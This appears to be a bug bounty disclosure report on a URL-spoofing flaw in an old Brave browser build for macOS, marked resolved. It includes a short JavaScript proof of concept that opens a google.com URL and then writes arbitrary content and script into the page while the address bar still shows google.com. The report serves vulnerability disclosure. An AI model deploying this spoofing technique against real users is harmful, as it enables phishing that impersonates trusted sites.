URL spoofing in Brave for macOS
Medium
B
Brave Software
Submitted None
Actions:
Reported by
metnew
Vulnerability Details
Technical details and impact analysis
## Summary:
URL spoofing vulnerability.
## Repro
```
<script>
window.onclick = function () {
x = window.open('https://www.google.com/csi');
setTimeout(function () {
x.document.write(`I am not a www.google.com;<button onclick="alert('I can run JS on this page!')">click me</button>`)
}, 100);
}
</script>
```
URL in address bar is `https://www.google.com/csi`, but actually that's about:blank page.
Attacker could inject arbitrary content and execute javascript on this page.
Additionally, during alert(), address bar continue displaying `www.google.com`
## Products affected:
Brave 0.22.810
V8 6.7.288.43
rev 8f30eeb
Muon 7.0.6
OS Release 17.6.0
Update Channel Release
OS Architecture x64
OS Platform macOS
Node.js 7.9.0
Brave Sync v1.4.2
libchromiumcontent 67.0.3396.71
OS: macOS 10.13.5 17F77 x86_64
## Impact
Typical URL spoofing vulnerability impact. Could be explained, if required.
Report Details
Additional information and metadata
State
Closed
Substate
Resolved